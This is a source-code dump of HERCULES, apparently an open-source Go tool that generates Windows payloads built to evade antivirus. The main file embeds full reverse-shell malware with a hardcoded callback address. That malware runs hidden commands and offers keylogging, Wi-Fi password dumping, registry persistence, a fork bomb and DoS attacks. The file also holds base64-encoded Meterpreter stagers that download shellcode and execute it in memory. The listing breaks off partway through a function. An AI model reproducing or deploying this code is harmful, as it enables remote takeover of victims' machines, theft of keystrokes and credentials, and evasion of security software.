├── HERCULES
├── LICENSE
├── README.md
├── SOURCE
├── HERCULES.go
└── Payloads
│ ├── HERCULES REVERSE SHELL.go
│ ├── Meterpreter_Reverse_HTTP_HTTPS.go
│ └── Meterpreter_Reverse_TCP.go
└── Setup.go
/HERCULES:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | cd $HERCULES_PATH
4 | cd SOURCE
5 | ./HERCULES
6 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | The MIT License (MIT)
2 |
3 | Copyright (c) 2016 Ege Balcı
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # HERCULES [](https://raw.githubusercontent.com/EgeBalci/HERCULES/master/LICENSE) [](https://github.com/EgeBalci/HERCULES/wiki) [](https://golang.org)
2 |
3 | HERCULES is a customizable payload generator that can bypass antivirus software.
4 |
5 |
6 | VERSION 3.0.5
7 |
8 |
9 | 
10 |
11 |
12 | #INSTALLATION
13 |
14 | SUPPORTED PLATFORMS:
15 |
16 |
17 |
18 | Operative system |
19 | Version |
20 |
21 |
22 | Ubuntu |
23 | 16.04 / 15.10 |
24 |
25 |
26 | Kali linux |
27 | Rolling / Sana |
28 |
29 |
30 | Manjaro |
31 | * |
32 |
33 |
34 | Arch Linux |
35 | * |
36 |
37 |
38 | Black Arch |
39 | * |
40 |
41 |
42 | Parrot OS |
43 | 3.1 |
44 |
45 |
46 |
47 | go get github.com/fatih/color
48 | go run Setup.go
49 |
50 | WARNING: Don't change the location of the HERCULES folder.
51 |
52 | #USAGE
53 |
54 | HERCULES
55 |
56 |
57 | #SPECIAL FUNCTIONS
58 |
59 |
60 | Persistence : Persistence function adds the running binary to windows start-up registry (CurrentVersion/Run) for continuous access.
61 |
62 | Migration : This function triggers a loop that tries to migrate to a remote process until it is successfully migrated.
63 |
64 | #WHAT IS UPX ?
65 |
66 | UPX (Ultimate Packer for Executables) is a free and open source executable packer supporting a number of file formats from different operating systems. UPX simply takes the binary file and compresses it, packed binary unpack(decompress) itself at runtime to memory.
67 |
68 | #WHAT IS "AV EVASION SCORE" ?
69 |
70 | AV Evasion Score is a scale(1/10) for determining the effectiveness of the payloads anti virus bypassing capabilities, 1 represents low possibility to pass AV softwares.
71 |
72 | Using special functions and packing the payloads with upx decreases the AV Evasion Score.
73 |
74 | 
75 |
76 | 
77 |
78 | Bitcoin: 16GvMV7eZH22p4rLQuu8h2gbgSLYr11KBM
79 |
80 |
81 | #COMING SOON...
82 |
83 | - Binary infector
84 | - Bypass AV functon
85 | - AES payload encryption
86 | - OSX support
87 |
88 |
89 |
--------------------------------------------------------------------------------
/SOURCE/HERCULES.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 |
4 | import "strings"
5 | import "fmt"
6 | import "os"
7 | import "time"
8 | import "strconv"
9 | import "net/http"
10 | import "io/ioutil"
11 | import "os/exec"
12 | import "encoding/base64"
13 | import "github.com/fatih/color"
14 |
15 |
16 | const VERSION string = "3.0.5"
17 |
18 | var HERCULES_REVERSE_SHELL string = "package main

import "net"
import "os/exec"
import "bufio"
import "strings"
import "syscall"
import "time"
import "EGESPLOIT"



const IP string = "10.10.10.84"
const PORT string = "5555"

const BACKDOOR bool = false;
const EMBEDDED bool = false;
const TIME_DELAY time.Duration = 5;//Second

const B64_BINARY string = "//INSERT-BINARY-HERE//"
const BINARY_NAME string = "winupdt.exe"

var GLOBAL_COMMAND string;
var PARAMETERS string;
var KeyLogs string;



func main() {


  if EMBEDDED == true {
    EGESPLOIT.Dispatch(B64_BINARY, BINARY_NAME, PARAMETERS)
  }


  if BACKDOOR == true {
    EGESPLOIT.Persistence()
  }

  connect, err := net.Dial("tcp", IP+":"+PORT);
  if err != nil {
    time.Sleep(TIME_DELAY*time.Second);
    main();
  };



  Dir, Version, Username, AV := EGESPLOIT.Sysguide()
  SysGuide := (BANNER + "# SYSGUIDE\n" + "|" + string(Version) + "|\n|\n~> User : " + string(Username) + "\n|\n|\n~> AV : " + string(AV)  + "\n\n\n" + string(Dir) + ">")
  connect.Write([]byte(string(SysGuide)));



  for {

    Command, _ := bufio.NewReader(connect).ReadString('\n');
    _Command := string(Command);
    GLOBAL_COMMAND = _Command;



    if strings.Contains(_Command, "~please") || strings.Contains(_Command, "~PLEASE") {
      connect.Write([]byte(EGESPLOIT.Please(GLOBAL_COMMAND)));
    }else if strings.Contains(_Command, "~METERPRETER") || strings.Contains(_Command, "~meterpreter") {
      Temp_Address := strings.Split(_Command, "\"")//~meterpreter --tcp "127.0.0.1:4444"
      Address := string(Temp_Address[1])
      ConType := strings.Split(_Command, " ")
      ConType[1] = strings.TrimPrefix(ConType[1], "--")
      EGESPLOIT.Meterpreter(ConType[1], Address)
      connect.Write([]byte("\n\n[+] Meterpreter Executed !\n\n"+Dir+">"));
    }else if strings.Contains(_Command, "~MIGRATE") || strings.Contains(_Command, "~migrate") {
      Temp_Address := strings.Split(_Command, "\"")//~migrate "127.0.0.1:4444" 1212
      Address := string(Temp_Address[1])
      Pid := strings.Split(_Command, " ")
      Result, Error := EGESPLOIT.Migrate(Pid[2], Address)
      if Result == true {
          connect.Write([]byte("\n\n[+] Succesfully Migrated !\n\n"+Dir+">"));
      }else{
        connect.Write([]byte("\n\n"+Error+"\n\n"+Dir+">"));
      }
    }else if strings.Contains(_Command, "~DOS") || strings.Contains(_Command, "~dos") {
      DOS_Command := strings.Split(GLOBAL_COMMAND, "\"")
      var DOS_Target string =  DOS_Command[1]
      if strings.Contains(string(DOS_Target), "http") {
        go EGESPLOIT.Dos(DOS_Target);
        connect.Write([]byte("\n\n[*] Starting DOS atack..."+"\n\n[*] Sending 1000 request to "+DOS_Target+" !\n\n"+Dir+">"));
      }else{
        connect.Write([]byte("\n\n[-] ERROR: Invalid url !\n\n"+Dir+">"));
      }
    }else if strings.Contains(_Command, "~DISTRACT") || strings.Contains(_Command, "~distract") {
      EGESPLOIT.Distrackt();
    }else if strings.Contains(_Command, "~KEYLOGGER-DEPLOY") || strings.Contains(_Command, "~keylogger-deploy") || strings.Contains(_Command, "~Keylogger-Deploy"){
      go EGESPLOIT.Keylogger(&KeyLogs);
       connect.Write([]byte(string("\n[*] Keylogger deploy completed\n" + "\n" + string(Dir) + ">")));
    }else if strings.Contains(_Command, "~KEYLOGGER-DUMP") || strings.Contains(_Command, "~keylogger-dump") || strings.Contains(_Command, "~Keylogger-Dump"){
      Dump_Output := string("################## KEYLOGGER DUMP ##################" + "\n\n" + string(KeyLogs) + "\n####################################################" + "\n"+string(Dir)+">");
      connect.Write([]byte(Dump_Output));
    }else if strings.Contains(_Command, "~WIFI-LIST") || strings.Contains(_Command, "~wifi-list") {
      List := EGESPLOIT.WifiList();
      connect.Write([]byte(string(List)));
    }else if strings.Contains(_Command, "~HELP") || strings.Contains(_Command, "~help") {
      connect.Write([]byte(string(HELP+Dir+">")));
    }else if strings.Contains(_Command, "~PERSISTENCE") || strings.Contains(_Command, "~persistence") {
      go EGESPLOIT.Persistence();
      connect.Write([]byte("\n\n[*] Adding persistence registries...\n[*] Persistence Completed\n\n" + string(Dir) +">"));
    }else{
      cmd := exec.Command("cmd", "/C", _Command);
      cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true};
      out, _ := cmd.Output();
      Command_Output := string("\n\n"+string(out)+"\n"+string(Dir)+">");
      connect.Write([]byte(Command_Output));
    };
  };
};






var BANNER string = `
                  __  ____________  ________  ____    ___________
                 / / / / ____/ __ \/ ____/ / / / /   / ____/ ___/
                / /_/ / __/ / /_/ / /   / / / / /   / __/  \__ \
               / __  / /___/ _, _/ /___/ /_/ / /___/ /___ ___/ /
              /_/ /_/_____/_/ |_|\____/\____/_____/_____//____/


############################ HERCULES REVERSE SHELL ############################
`




var HELP string = `

                  __  ____________  ________  ____    ___________
                 / / / / ____/ __ \/ ____/ / / / /   / ____/ ___/
                / /_/ / __/ / /_/ / /   / / / / /   / __/  \__ \
               / __  / /___/ _, _/ /___/ /_/ / /___/ /___ ___/ /
              /_/ /_/_____/_/ |_|\____/\____/_____/_____//____/


############################ HERCULES REVERSE SHELL ##########################################



~PERSSISTENCE                         Installs a persistence module for continious acces

~DISTRACT                             Executes a fork bomb bat file for distraction

~PLEASE                               Asks users comfirmation for higher privilidge operations

~DOS -A "www.targetsite.com"          Starts a denial of service atack

~WIFI-LIST 						                Dumps all wifi history data with passwords

~METERPRETER --http "10.0.0.1:4444"   Creates a meterpreter connection to metasploit (http/https/tcp)

~KEYLOGGER-DEPLOY                     Installs a keylogger module and logs all keystrokes

~KEYLOGGER-DUMP                       Dumps all loged keystrokes

~MIGRATE "10.0.0.1:4444" 2222         Creates a reverse http meterpreter session at given pid (EXPERIMENTAL)


###############################################################################################

`
"
19 | var METERPRETER_TCP string = "cGFja2FnZSBtYWluCgoKaW1wb3J0ICJlbmNvZGluZy9iaW5hcnkiCmltcG9ydCAic3lzY2FsbCIKaW1wb3J0ICJ1bnNhZmUiCi8vaW1wb3J0ICJFR0VTUExPSVQvUlNFIgoKY29uc3QgTUVNX0NPTU1JVCAgPSAweDEwMDAKY29uc3QgTUVNX1JFU0VSVkUgPSAweDIwMDAKY29uc3QgUEFHRV9BbGxvY2F0ZVVURV9SRUFEV1JJVEUgID0gMHg0MAoKCnZhciBLMzIgPSBzeXNjYWxsLk5ld0xhenlETEwoImtlcm5lbDMyLmRsbCIpCnZhciBWaXJ0dWFsQWxsb2MgPSBLMzIuTmV3UHJvYygiVmlydHVhbEFsbG9jIikKCgpmdW5jIEFsbG9jYXRlKFNoZWxsY29kZSB1aW50cHRyKSAodWludHB0cikgewoKCUFkZHIsIF8sIF8gOj0gVmlydHVhbEFsbG9jLkNhbGwoMCwgU2hlbGxjb2RlLCBNRU1fUkVTRVJWRXxNRU1fQ09NTUlULCBQQUdFX0FsbG9jYXRlVVRFX1JFQURXUklURSkKCWlmIEFkZHIgPT0gMCB7CgkJbWFpbigpCgl9CglyZXR1cm4gQWRkcgp9CgpmdW5jIG1haW4oKSB7CgkvL1JTRS5QZXJzaXN0ZW5jZSgpCgl2YXIgV1NBX0RhdGEgc3lzY2FsbC5XU0FEYXRhCglzeXNjYWxsLldTQVN0YXJ0dXAodWludDMyKDB4MjAyKSwgJldTQV9EYXRhKQoJU29ja2V0LCBfIDo9IHN5c2NhbGwuU29ja2V0KHN5c2NhbGwuQUZfSU5FVCwgc3lzY2FsbC5TT0NLX1NUUkVBTSwgMCkKCVNvY2tldF9BZGRyIDo9IHN5c2NhbGwuU29ja2FkZHJJbmV0NHtQb3J0OiA1NTU1LCBBZGRyOiBbNF1ieXRlezEyNywwLDAsMX19CglzeXNjYWxsLkNvbm5lY3QoU29ja2V0LCAmU29ja2V0X0FkZHIpCgl2YXIgTGVuZ3RoIFs0XWJ5dGUKCVdTQV9CdWZmZXIgOj0gc3lzY2FsbC5XU0FCdWZ7TGVuOiB1aW50MzIoNCksIEJ1ZjogJkxlbmd0aFswXX0KCVVpdG5aZXJvXzEgOj0gdWludDMyKDApCglEYXRhUmVjZWl2ZWQgOj0gdWludDMyKDApCglzeXNjYWxsLldTQVJlY3YoU29ja2V0LCAmV1NBX0J1ZmZlciwgMSwgJkRhdGFSZWNlaXZlZCwgJlVpdG5aZXJvXzEsIG5pbCwgbmlsKQoJTGVuZ3RoX2ludCA6PSBiaW5hcnkuTGl0dGxlRW5kaWFuLlVpbnQzMihMZW5ndGhbOl0pCglpZiBMZW5ndGhfaW50IDwgMTAwIHsKCQltYWluKCkKCX0KCVNoZWxsY29kZV9CdWZmZXIgOj0gbWFrZShbXWJ5dGUsIExlbmd0aF9pbnQpCgoJdmFyIFNoZWxsY29kZSBbXWJ5dGUKCVdTQV9CdWZmZXIgPSBzeXNjYWxsLldTQUJ1ZntMZW46IExlbmd0aF9pbnQsIEJ1ZjogJlNoZWxsY29kZV9CdWZmZXJbMF19CglVaXRuWmVyb18xID0gdWludDMyKDApCglEYXRhUmVjZWl2ZWQgPSB1aW50MzIoMCkKCVRvdGFsRGF0YVJlY2VpdmVkIDo9IHVpbnQzMigwKQoJZm9yIFRvdGFsRGF0YVJlY2VpdmVkIDwgTGVuZ3RoX2ludCB7CgkJc3lzY2FsbC5XU0FSZWN2KFNvY2tldCwgJldTQV9CdWZmZXIsIDEsICZEYXRhUmVjZWl2ZWQsICZVaXRuWmVyb18xLCBuaWwsIG5pbCkKCQlmb3IgaSA6PSAwOyBpIDwgaW50KERhdGFSZWNlaXZlZCk7IGkrKyB7CgkJCVNoZWxsY29kZSA9IGFwcGVuZChTaGVsbGNvZGUsIFNoZWxsY29kZV9CdWZmZXJbaV0pCgkJfQoJCVRvdGFsRGF0YVJlY2VpdmVkICs9IERhdGFSZWNlaXZlZAoJfQoKCUFkZHIgOj0gQWxsb2NhdGUodWludHB0cihMZW5ndGhfaW50ICsgNSkpCglBZGRyUHRyIDo9ICgqWzk5MDAwMF1ieXRlKSh1bnNhZmUuUG9pbnRlcihBZGRyKSkKCVNvY2tldFB0ciA6PSAodWludHB0cikodW5zYWZlLlBvaW50ZXIoU29ja2V0KSkKCUFkZHJQdHJbMF0gPSAweEJGCglBZGRyUHRyWzFdID0gYnl0ZShTb2NrZXRQdHIpCglBZGRyUHRyWzJdID0gMHgwMAoJQWRkclB0clszXSA9IDB4MDAKCUFkZHJQdHJbNF0gPSAweDAwCglmb3IgQnB1QUtySnhmbCwgSUluZ2FjTWFCaCA6PSByYW5nZSBTaGVsbGNvZGUgewoJCUFkZHJQdHJbQnB1QUtySnhmbCs1XSA9IElJbmdhY01hQmgKCX0KCS8vUlNFLk1pZ3JhdGUoQWRkciwgaW50KExlbmd0aF9pbnQpKQoJc3lzY2FsbC5TeXNjYWxsKEFkZHIsIDAsIDAsIDAsIDApCn0KCi8qCgoxLiBDcmVhdGUgV1NBIERBVEEgdmVyc2lvbiAyLjIKMi4gQ3JlYXRlIGEgV1NBIFNvY2tldAozLiBDcmVhdGUgV1NBIFNvY2tldCBBZGRyZXNzIG9iamVjdAo0LiBDb25uZWN0CjUuIENyZWF0ZSA0IGJ5dGUgc2Vjb25kIHN0YWdlIGxlbmd0aCBhcnJheQo2LiBDcmVhdGUgYSBXU0EgQnVmZmVyIG9iamVjdCBwb2ludGluZyBzZWNvbmQgc3RhZ2UgbGVuZ3RoIGFycmF5CjcuIFJlY2VpdmUgNCBieXRlcyBXU0FSZWN2IHRvIHNlY29uZCBzdGFnZSBsZW5ndGggYXJyYXkKOC4gQ29udmVydCBzZWNvbmQgc3RhZ2UgbGVuZ3RoIHRvIGludAo5LiBDcmVhdGUgYSBieXRlIGFycmF5IGF0IHRoZSBzaXplIG9mIHNlY29uZCBzdGFnZSBieXRlIGFycmF5IGZvciBzZWNvbmQgc3RhZ2Ugc2hlbGxjb2RlCjEwLiBDcmVhdGUgYSB1bmRlZmluZWQgYnl0ZSBhcnJheQoxMS4gQ3JlYXRlIGFub3RoZXIgV1NBIGJ1ZmZlciBvYmplY3QgcG9pbnRpbmcgYXQgc2Vjb25kIHN0YWdlIHNoZWxsY29kZSBieXRlIGFycmF5CjEyLiBDb25zdHJ1Y3QgYSBuZXN0ZWQgZm9yIGxvb3AgdGhhdCByZWNlaXZlcyBieXRlcyBhbmQgYXBwZW5kcyB0aGVtIGludG8gdW5kZWZpbmVkIGJ5dGUgYXJyYXkKMTMuIEFsbG9jYXRlIHNwYWNlIGluIG1lbW9yeSBhdCB0aGUgc2l6ZSBvZiAoc2Vjb25kIHN0YWdlIHNoZWxsY29kZSArIDUpCjE0LiBDcmVhdGUgYSBwb2ludGVyIHRoYXQgcG9pbnRzIHRvIFdTQSBTb2NrZXQKMTUuIEFzc2luZyAweEJGKG1vdiBlZGkpIHRvIGZpc3QgYnl0ZSBvZiBhbGxvY2F0ZWQgbWVtb3J5CjE2LiBBc3NpbmcgV1NBIFNvY2tldCBwb2ludGVyIHRvIHNlY29uZCBieXRlIG9mIGFsbG9jYXRlZCBtZW1vcnkKMTcuIEFzc2luZyB0cmVlIG51bGwgYnl0ZXMgYWZ0ZXIgc2Vjb25kIGJ5dGUgb2YgYWxsb2NhdGVkIG1lbW9yeQoxOC4gTW92ZSBzaGVsbGNvZGUgYnl0ZXMgdG8gYWxsb2NhdGVkIG1lbW9yeSBzdGFydGluZyBhdCBmaWZ0IGJ5dGUKMTkuIE1ha2UgYSBzeXNjYWxsIHRvIGFsbG9jYXRlZCBtZW1vcnkgYWRkcmVzcwoqLwo="
20 | var METERPRETER_HTTP_HTTPS string = "cGFja2FnZSBtYWluCgppbXBvcnQgIm5ldC9odHRwIgppbXBvcnQgInN5c2NhbGwiCmltcG9ydCAidW5zYWZlIgppbXBvcnQgImlvL2lvdXRpbCIKLy9pbXBvcnQgIkVHRVNQTE9JVC9SU0UiCgoKCmNvbnN0IE1FTV9DT01NSVQgID0gMHgxMDAwCmNvbnN0IE1FTV9SRVNFUlZFID0gMHgyMDAwCmNvbnN0IFBBR0VfQWxsb2NhdGVVVEVfUkVBRFdSSVRFICA9IDB4NDAKCnZhciBLMzIgPSBzeXNjYWxsLk5ld0xhenlETEwoImtlcm5lbDMyLmRsbCIpCnZhciBWaXJ0dWFsQWxsb2MgPSBLMzIuTmV3UHJvYygiVmlydHVhbEFsbG9jIikKdmFyIEFkZHJlc3Mgc3RyaW5nID0gImh0dHA6Ly8xMjcuMC4wLjE6ODA4MC8iCnZhciBDaGVja3N1bSBzdHJpbmcgPSAiMTAyMDExYjd0eHBsNzFuIgoKCgpmdW5jIG1haW4oKSB7CiAgLy9SU0UuUGVyc2lzdGVuY2UoKQogIEFkZHJlc3MgKz0gQ2hlY2tzdW0KICBSZXNwb25zZSwgZXJyIDo9IGh0dHAuR2V0KEFkZHJlc3MpCiAgaWYgZXJyICE9IG5pbCB7CiAgICBtYWluKCkKICB9CiAgU2hlbGxjb2RlLCBfIDo9IGlvdXRpbC5SZWFkQWxsKFJlc3BvbnNlLkJvZHkpCgogIEFkZHIsIF8sIGVyciA6PSBWaXJ0dWFsQWxsb2MuQ2FsbCgwLCB1aW50cHRyKGxlbihTaGVsbGNvZGUpKSwgTUVNX1JFU0VSVkV8TUVNX0NPTU1JVCwgUEFHRV9BbGxvY2F0ZVVURV9SRUFEV1JJVEUpCiAgaWYgQWRkciA9PSAwIHsKICAgIG1haW4oKQogIH0KICBBZGRyUHRyIDo9ICgqWzk5MDAwMF1ieXRlKSh1bnNhZmUuUG9pbnRlcihBZGRyKSkKICBmb3IgaSA6PSAwOyBpIDwgbGVuKFNoZWxsY29kZSk7IGkrKyB7CiAgICBBZGRyUHRyW2ldID0gU2hlbGxjb2RlW2ldCiAgfQogIC8vUlNFLk1pZ3JhdGUoQWRkciwgbGVuKFNoZWxsY29kZSkpCiAgc3lzY2FsbC5TeXNjYWxsKEFkZHIsIDAsIDAsIDAsIDApCgp9Cg=="
21 |
22 | type PAYLOAD struct {
23 | Ip string
24 | Port string
25 | Type int
26 | Size string
27 | UPX_Size string
28 | MidSize string
29 | FullSize string
30 | Score float32
31 | FileName string
32 | SourceCode string
33 | Persistence bool
34 | Migrate bool
35 | BypassAV bool
36 | UPX bool
37 |
38 | }
39 |
40 | var Payload PAYLOAD
41 | var MenuSelection int
42 | var Ask string
43 | var NO int
44 |
45 |
46 |
47 | func main() {
48 |
49 | Green := color.New(color.FgGreen)
50 | BoldGreen := Green.Add(color.Bold)
51 | Yellow := color.New(color.FgYellow)
52 | BoldYellow := Yellow.Add(color.Bold)
53 | Red := color.New(color.FgRed)
54 | BoldRed := Red.Add(color.Bold)
55 |
56 |
57 | Result := CheckSetup()
58 |
59 | if Result == false {
60 | ClearScreen()
61 | PrintBanner()
62 | PrintCredit()
63 |
64 | BoldRed.Println("\n\n[!] HERCULES is not installed properly, please run setup.sh")
65 |
66 | os.Exit(1)
67 |
68 | }
69 |
70 | ClearScreen()
71 | PrintBanner()
72 | PrintCredit()
73 | Menu_1()
74 |
75 | fmt.Scan(&MenuSelection)
76 |
77 | ClearScreen()
78 |
79 | if MenuSelection == 1 {
80 | PrintBanner()
81 | PrintPayloads()
82 | fmt.Print("\n\n[*] Select : ")
83 | fmt.Scan(&NO)
84 | PreparePayload(NO)
85 |
86 | fmt.Print("\n\n[*] Enter the base name for output files : ")
87 | fmt.Scan(&Payload.FileName)
88 | CompilePayload()
89 | AskUPX()
90 | FinalView()
91 | }else if MenuSelection == 2 {
92 | ClearScreen()
93 | PrintBanner()
94 | PrintCredit()
95 | BoldRed.Println("\n\n[!] Bind payload option will be added at next version...")
96 | time.Sleep(3*time.Second)
97 | main()
98 | }else if MenuSelection == 3 {
99 | ClearScreen()
100 | PrintBanner()
101 | PrintCredit()
102 | fmt.Println("\n\n")
103 | Result := ChecVersion()
104 | if strings.Contains(Result, "[!]") {
105 | BoldRed.Println(Result)
106 | if Result == "[!] New version detected" {
107 | BoldYellow.Print("\nDo you want to upgrade ? (y/n) : ")
108 | fmt.Scan(&Ask)
109 | if Ask == "y" || Ask == "Y" {
110 | Update := exec.Command("sh", "-c", "chmod 777 Update && sudo ./Update")
111 | Update.Stdout = os.Stdout
112 | Update.Stderr = os.Stderr
113 | Update.Start()
114 | }else{
115 | main()
116 | }
117 | }
118 | }else{
119 | BoldGreen.Println(Result)
120 | time.Sleep(3*time.Second)
121 | main()
122 | }
123 | }else{
124 | main()
125 | }
126 |
127 |
128 | }
129 |
130 | func CheckSetup() (bool){
131 |
132 | DirList, _ := exec.Command("sh", "-c", "cd $HERCULES_PATH/src && ls").Output()
133 | GoVer, _ := exec.Command("sh", "-c", "go version").Output()
134 | UPX, _ := exec.Command("sh", "-c", "upx").Output()
135 |
136 | if (!(strings.Contains(string(DirList), "EGESPLOIT"))) {
137 | return false
138 | }
139 |
140 | if !(strings.Contains(string(GoVer), "version")) {
141 | return false
142 | }
143 | if !(strings.Contains(string(UPX), "Markus")) {
144 | return false
145 | }
146 | return true
147 | }
148 |
149 |
150 | func ChecVersion() (string){
151 |
152 | Response, Error := http.Get("https://raw.githubusercontent.com/EgeBalci/HERCULES/master/SOURCE/HERCULES.go")
153 | if Error != nil {
154 | return "[!] ERROR : Connection attempt failed"
155 | }
156 | Body, _ := ioutil.ReadAll(Response.Body)
157 |
158 | Version := string(`"`+VERSION+`"`)
159 |
160 | if !(strings.Contains(string(Body), Version)) {
161 | return "[!] New version detected"
162 | }else{
163 | return "[+] HERCULES is up to date"
164 | }
165 |
166 | }
167 |
168 |
169 | func PrintBanner() {
170 | color.Red(" ██░ ██ ▓█████ ██▀███ ▄████▄ █ ██ ██▓ ▓█████ ██████ ")
171 | color.Red("▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ██ ▓██▒▓██▒ ▓█ ▀ ▒██ ▒ ")
172 | color.Red("▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▓██ ▒██░▒██░ ▒███ ░ ▓██▄ ")
173 | color.Red("░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▓▓█ ░██░▒██░ ▒▓█ ▄ ▒ ██▒")
174 | color.Red("░▓█▒░██▓░▒████▒░██▓ ▒██▒▒ ▓███▀ ░▒▒█████▓ ░██████▒░▒████▒▒██████▒▒")
175 | color.Red(" ▒ ░░▒░▒░░ ▒░ ░░ ▒▓ ░▒▓░░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ░ ▒░▓ ░░░ ▒░ ░▒ ▒▓▒ ▒ ░")
176 | color.Red(" ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░░▒░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░▒ ░ ░")
177 | color.Red(" ░ ░░ ░ ░ ░░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░ ")
178 | color.Red(" ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ")
179 | color.Red(" ░ ")
180 |
181 | }
182 |
183 | func PrintCredit() {
184 | Green := color.New(color.FgGreen)
185 | BoldGreen := Green.Add(color.Bold)
186 | color.Green("\n+ -- --=[ HERCULES FRAMEWORK ]")
187 | color.Green("+ -- --=[ Version: "+VERSION+" ]")
188 | BoldGreen.Println("+ -- --=[ Ege Balcı ]")
189 | }
190 |
191 |
192 | func Menu_1() {
193 | Yellow := color.New(color.FgYellow)
194 | BoldYellow := Yellow.Add(color.Bold)
195 | White := color.New(color.FgWhite)
196 | UnderlinedWhite := White.Add(color.Underline)
197 | BoldYellow.Println("\n[1] GENERATE PAYLOAD ")
198 | BoldYellow.Println("\n[2] BIND PAYLOAD ")
199 | BoldYellow.Println("\n[3] UPDATE ")
200 |
201 | UnderlinedWhite.Print("\n\n[*] Select : ")
202 | }
203 |
204 | func PrintPayloads() {
205 |
206 | White := color.New(color.FgWhite)
207 | BoldWhite := White.Add(color.Bold)
208 | Green := color.New(color.FgGreen)
209 | BoldGreen := Green.Add(color.Bold)
210 |
211 |
212 | fmt.Println("\n")
213 | BoldWhite.Println(" #===============================================================================#")
214 | BoldWhite.Println(" | PAYLOAD | SIZE/UPX | AV Evasion Score |")
215 | BoldWhite.Println(" |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~|")
216 | BoldWhite.Print("(1) Meterpreter Reverse TCP | 946 KB / 262 KB | ")
217 | BoldGreen.Print(" 8/10 ")
218 | BoldWhite.Println("|")
219 | BoldWhite.Println(" | | | |")
220 | BoldWhite.Print("(2) Meterpreter Reverse HTTP | 4.2 MB / 1.1 MB | ")
221 | BoldGreen.Print(" 8/10 ")
222 | BoldWhite.Println("|")
223 | BoldWhite.Println(" | | | |")
224 | BoldWhite.Print("(3) Meterpreter Reverse HTTPS | 4.2 MB / 1.1 MB | ")
225 | BoldGreen.Print(" 8/10 ")
226 | BoldWhite.Println("|")
227 | BoldWhite.Println(" | | | |")
228 | BoldWhite.Print("(4) HERCULES REVERSE SHELL | 4.4 MB / 1.1 MB | ")
229 | BoldGreen.Print("7/10 ")
230 | BoldWhite.Println("|")
231 | BoldWhite.Println(" | | | |")
232 | BoldWhite.Println(" #===============================================================================#")
233 | fmt.Println("\n")
234 | }
235 |
236 |
237 | func FinalView() {
238 | Cyan := color.New(color.FgCyan)
239 | BoldCyan := Cyan.Add(color.Bold)
240 | Green := color.New(color.FgGreen)
241 | BoldGreen := Green.Add(color.Bold)
242 | Blue := color.New(color.FgBlue)
243 | BoldBlue := Blue.Add(color.Bold)
244 | Yellow := color.New(color.FgYellow)
245 | BoldYellow := Yellow.Add(color.Bold)
246 | Red := color.New(color.FgRed)
247 | BoldRed := Red.Add(color.Bold)
248 | White := color.New(color.FgWhite)
249 | BoldWhite := White.Add(color.Bold)
250 | ClearScreen()
251 | PrintBanner()
252 |
253 | if Payload.Type == 1 {
254 | BoldBlue.Println("#====================================================================================#")
255 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #")
256 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#")
257 | BoldBlue.Print("# Meterpreter Reverse TCP | 946 KB / 262 KB | ")
258 | if Payload.Score < 5 {
259 | BoldRed.Print(Payload.Score)
260 | }else if Payload.Score == 5 {
261 | BoldYellow.Print(Payload.Score)
262 | }else {
263 | BoldGreen.Print(Payload.Score)
264 | }
265 | if Payload.Score == 10 {
266 | BoldGreen.Print("/10 ")
267 | }else{
268 | BoldGreen.Print("/10 ")
269 | }
270 | BoldBlue.Println("#")
271 | BoldBlue.Println("#====================================================================================#")
272 | }else if Payload.Type == 2 {
273 | BoldBlue.Println("#====================================================================================#")
274 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #")
275 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#")
276 | BoldBlue.Print("# Meterpreter Reverse HTTP | 4.2 MB / 1.1 MB | ")
277 | if Payload.Score < 5 {
278 | BoldRed.Print(Payload.Score)
279 | }else if Payload.Score == 5 {
280 | BoldYellow.Print(Payload.Score)
281 | }else {
282 | BoldGreen.Print(Payload.Score)
283 | }
284 | if Payload.Score == 10 {
285 | BoldGreen.Print("/10 ")
286 | }else{
287 | BoldGreen.Print("/10 ")
288 | }
289 | BoldBlue.Println("#")
290 | BoldBlue.Println("#====================================================================================#")
291 | }else if Payload.Type == 3 {
